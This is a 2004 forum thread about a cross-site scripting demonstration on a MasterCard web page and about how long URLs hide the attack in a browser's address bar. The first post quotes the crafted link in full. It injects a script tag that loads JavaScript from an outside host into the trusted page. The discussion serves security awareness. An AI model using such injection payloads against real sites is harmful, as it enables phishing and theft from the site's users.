ibe98765
I'm not sure about this. I tired the MasterCard test. This is the URL I see in the address bar. It would make me immediately suspicious. This is the code behind the link: http://www.mastercard.com/fac/facStart.do?productId="><script%20src='http://www.zapthedingbat.com/security/scriptinjection/mastercard.js'></script>http://www.mastercard.com/fac/facStart.do?...</script> This is what the link looks like: http://www.mastercard.com/fac/facStart.do?... EDIT: The above link has been changed to be code only to prevent folks from accidentally clicking on a Phishing Scheme. Hopefully by breaking it out it still gives a representation of what ibe was trying to get across. Edited July 20, 2004 by LilBambi
Ed_P
The URL is so long my Location window doesn't show the right hand side since the address is left justified. I suspect that is what most people see. Some of the sites with links referenced in the article have fixed the problem but not all of them. ibe98765
This is why I always leave the Address bar on it's own line in the browser so that I can see as much as possible. It takes up the full width of the browser window.
